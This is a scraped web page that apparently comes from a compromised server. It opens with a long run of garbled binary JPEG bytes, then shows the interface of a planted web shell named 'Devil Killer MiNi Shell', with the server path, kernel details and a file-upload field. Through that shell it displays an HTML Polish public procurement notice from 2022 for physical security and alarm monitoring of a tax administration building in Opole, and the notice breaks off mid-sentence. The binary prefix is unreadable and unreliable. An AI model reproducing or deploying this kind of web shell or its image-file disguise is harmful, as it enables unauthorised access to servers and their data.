JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220620/0021486601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie kompleksowej usługi ochrony fizycznej oraz monitoringu obiektu Izby Administracji Skarbowej w Opolu oraz II Urzędu Skarbowego w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Izba Administracji Skarbowej w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001022920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ozimska 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-057</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ias.opole@mf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opolskie.kas.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie kompleksowej usługi ochrony fizycznej oraz monitoringu obiektu Izby Administracji Skarbowej w Opolu oraz II Urzędu Skarbowego w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d01787ad-f077-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00214866</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00079782/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Świadczenie kompleksowej usługi ochrony fizycznej oraz monitoringu obiektu Izby Administracji Skarbowej w Opolu oraz II Urzędu Skarbowego w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie<br/>korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Izba Administracji Skarbowej w Opolu (dalej IAS w Opolu) działając jako Zamawiający w<br/>postępowaniu informuje, że:<br/>1. Administratorem danych osobowych jest Dyrektor IAS w Opolu z siedzibą przy ul. Ozimskiej 19, 45-057 Opole, tel. (77) 454 00 67,<br/>e-mail: sekretariat.ias.opole@mf.gov.pl.<br/>2. W IAS w Opolu wyznaczony został Inspektor Ochrony Danych, z którym można skontaktować się drogą elektroniczną pod<br/>adresem e-mail iod.opole@mf.gov.pl lub telefonicznie pod numerem (77) 440 32 77.<br/>3. Dane osobowe będą zbierane i przetwarzane na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, dalej: RODO)<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego oraz zawarciem umowy na Świadczenie kompleksowej usługi ochrony fizycznej oraz monitoringu obiektu Izby Administracji Skarbowej w Opolu oraz II Urzędu Skarbowego w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu.<br/>4. Odbiorcami danych osobowych będą pracownicy IAS w Opolu, osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp, podmiotom prowadzącym działalność pocztową lub kurierską, podmiotom<br/>odpowiedzialnym za obsługę systemów informatycznych i sprzętu, innym podmiotom w zakresie w jakim Administrator będzie do<br/>tego zobowiązany przepisami prawa, w tym Krajowej Izbie Odwoławczej, organom kontrolującym.<br/>5. Dane osobowe będą przechowywane, zgodnie z przepisami prawa, przez okres niezbędny do realizacji celów przetwarzania<br/>wskazanych w pkt 3, lecz nie krócej niż okres wskazany w przepisach o archiwizacji.<br/>6. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Osoba, której dane osobowe dotyczą posiada:<br/>- na podstawie art. 15 RODO prawo dostępu do dotyczących jej danych osobowych;<br/>- na podstawie art. 16 RODO prawo do sprostowania dotyczących jej danych osobowych ;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania jej danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO *** ;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie dotyczących jej danych<br/>osobowych narusza przepisy RODO;<br/>9. Osobie, której dane osobowe dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia dotyczących jej danych osobowych;<br/>- prawo do przenoszenia dotyczących jej danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania dotyczących jej danych osobowych, gdyż podstawą prawną<br/>przetwarzania dotyczących jej danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10. Wykonawca ubiegając się o udzielenie ww. zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków<br/>formalno-prawnych związanych z udziałem w postępowaniu, m.in. wynikających z RODO, w szczególności obowiązek informacyjny<br/>przewidziany w art. 13 lub art. 14 RODO w stosunku do osób, których dane zostały przekazane o fakcie i zakresie przekazanych<br/>danych, o danych kontaktowych Administratora oraz zasadach przetwarzania danych wskazanych w niniejszej informacji.<br/>11. Treść klauzuli informacyjnej, dotyczącej przetwarzania danych osobowych, znajdą Państwo na stronie Biuletynu Informacji<br/>Publicznej (BIP) pod adresem https://www.opolskie.kas.gov.pl/ w zakładce Organizacja – Ochrona Danych Osobowych oraz w<br/>siedzibach organów Krajowej Administracji Skarbowej danego województwa na tablicach informacyjnych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1601-ILZ.260.28.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi ochrony osób i mienia w obiekcie Izby Administracji Skarbowej w Opolu oraz II Urzędu Skarbowego w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu, usługi monitorowania lokalnego systemu alarmowego (łączami telefonicznymi) zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2021 r. poz. 1995), dalej ustawą o ochronie osób i mienia, polegającej na:<br/>1)	stałej i doraźnej ochronie fizycznej,<br/>2)	monitoringu systemu sygnalizacji włamania i napadu wraz z funkcjonowaniem grup interwencyjnych;<br/>3)	usługach odśnieżania terenów zewnętrznych. <br/>Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do PPU. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji będzie polegać na możliwości zlecenia dodatkowych godzin usługi ochrony, które będą uzgadniane z co najmniej 12 godzinnym wyprzedzeniem i będą realizowane dodatkowo po cenie dodatkowej roboczogodziny podanej w ofercie Wykonawcy.<br/>Zamawiający nie określa wymiaru godzin objętych prawem opcji a tylko wartość procentową dla udzielonej wartości zamówienia. Prawo opcji wyniesie maksymalnie 15 % udzielonej wartości zamówienia gwarantowanego objętego przedmiotem zamówienia.<br/>Okoliczności skorzystania z prawa opcji wskazano w Rozdziale 4 SWZ oraz § 1 ust. 13 – 19 PPU <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) – waga kryterium 60 %;<br/>2)	Czas przybycia patrolu interwencyjnego (T) – waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	W kryterium „Cena” punkty dla ofert zostaną wyliczone zgodnie z poniższym wzorem dla każdego typu kryterium cenowego wg poniższego wzoru:<br/>Najniższa cena oferty/roboczogodziny prawa opcji brutto<br/>P = -----------------------------------------------------------------------x 100 pkt x waga<br/>Cena oferty/roboczogodziny prawa opcji brutto w ofercie ocenianej<br/>gdzie:<br/>P – ilość punktów dla badanego kryterium cenowego oferty<br/>C = Pz + Prh<br/>gdzie:<br/>C – całkowita ilość punktów przyznana ocenianej ofercie w kryterium „Cena”<br/>a)	Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto za realizację zamówienia podana przez Wykonawcę w formularzu ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	W kryterium „Czas przybycia patrolu interwencyjnego” Zamawiający będzie przyznawał punkty w następujący sposób:<br/>•	do 10 minut – 40 pkt<br/>•	do 15 minut – 0 pkt.<br/>a)	Maksymalna liczba punktów do uzyskania w kryterium wynosi 40 pkt.<br/>b)	Jeżeli Wykonawca zaoferuje czas przybycia patrolu interwencyjnego do poszczególnych jednostek dłuższy niż 15 minut, jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodna z warunkami zamówienia.<br/>c)	Jeżeli Wykonawca zaoferuje czas przybycia patrolu interwencyjnego do poszczególnych jednostek krótszy niż 10 minut, jego oferta otrzyma 40 pkt<br/>natomiast w umowie z wybranym Wykonawcą zostanie wpisany czas reakcji<br/>wskazany w ofercie.<br/>d)	Czas przybycia patrolu interwencyjnego do poszczególnych jednostek należy liczyć od chwili wezwania lub otrzymania sygnału alarmowego z obiektu Zamawiającego.<br/>3.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>4.	Za najkorzystniejszą zostanie uznana oferta z najwyższą liczbą punktów.<br/>5.	Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>6.	Jeżeli̇ termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.	W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej̇ oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przybycia patrolu interwencyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale 16 SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualną koncesję na<br/>prowadzenie działalności gospodarczej w zakresie usług ochrony mienia<br/>realizowanych w formie bezpośredniej ochrony fizycznej i zabezpieczenia<br/>technicznego, o której mowa w art. 15 ust. 1 ustawy ochronie osób i mienia.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego<br/>ubezpieczenia na kwotę ubezpieczenia nie mniejszą niż 1 000 000,00 zł.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje, co najmniej dwie usługi ochrony osób i mienia wraz z usługą nadzoru przy użyciu alarmu, w tym każda realizowana w okresie co najmniej 12 miesięcy o wartości rocznej nie mniejszej niż 200 000 zł brutto (słownie: dwieście tysięcy zł brutto).<br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4.	Przez jedną usługę Zamawiający rozumie usługę realizowaną na podstawie jednej umowy.<br/>5.	W przypadku zamówień nadal realizowanych Wykonawca winien podać w wykazie usług ich wartość tylko w zakresie już zrealizowanym najpóźniej do dnia składania ofert.<br/>6.	Wykonawca powołując się na doświadczenie nabyte w ramach zamówień, w których uczestniczył wspólnie z innymi Wykonawcami jako członek konsorcjum, musi wykazać, że faktycznie uczestniczy/uczestniczył w jego realizacji jak również wskazać jaką część faktycznie realizuje/realizował.<br/>7.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), zgodnie z art. 117 ust. 1 Pzp:<br/>1)	warunek posiadania koncesji musi spełniać każdy z Wykonawców lub co najmniej ten, który zrealizuje zadania, do których realizacji wymagane jest posiadanie uprawnień i danej koncesji. Jeżeli dany Wykonawca będzie odpowiedzialny tylko i wyłącznie za ochronę osób i mienia to spełni powyższy warunek, jeżeli wykaże, że posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony mienia realizowanych w formie bezpośredniej ochrony fizycznej (nie musi wówczas posiadać licencji w zakresie zabezpieczenia technicznego);<br/>2)	warunek posiadania doświadczenia musi być spełniony w całości przez co najmniej jeden podmiot (jeden lub każdy z podmiotów musi posiadać wymagane doświadczenie). Dokumenty na potwierdzenie spełnienia warunków udziału w postępowaniu składa, co najmniej jeden z tych Wykonawców. Zamawiający nie dopuszcza sytuacji, w której Wykonawcy rozdzielą między siebie ten warunek, że każdy z nich wykaże po jednej usłudze;<br/>3)	warunek posiadania ubezpieczenia od odpowiedzialności cywilnej musi zostać spełniony przez co najmniej jednego z Wykonawców.<br/>8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>9.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie niepodlegania wykluczeniu opisane zostały w Rozdziale 21 SWZ.<br/>1.	Na wezwanie Zamawiającego, Wykonawca, którego oferta została najwyżej oceniona, jest zobowiązany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych w celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu.<br/>2.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	informacji z Krajowego Rejestru Karnego w zakresie:<br/>a)	art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne 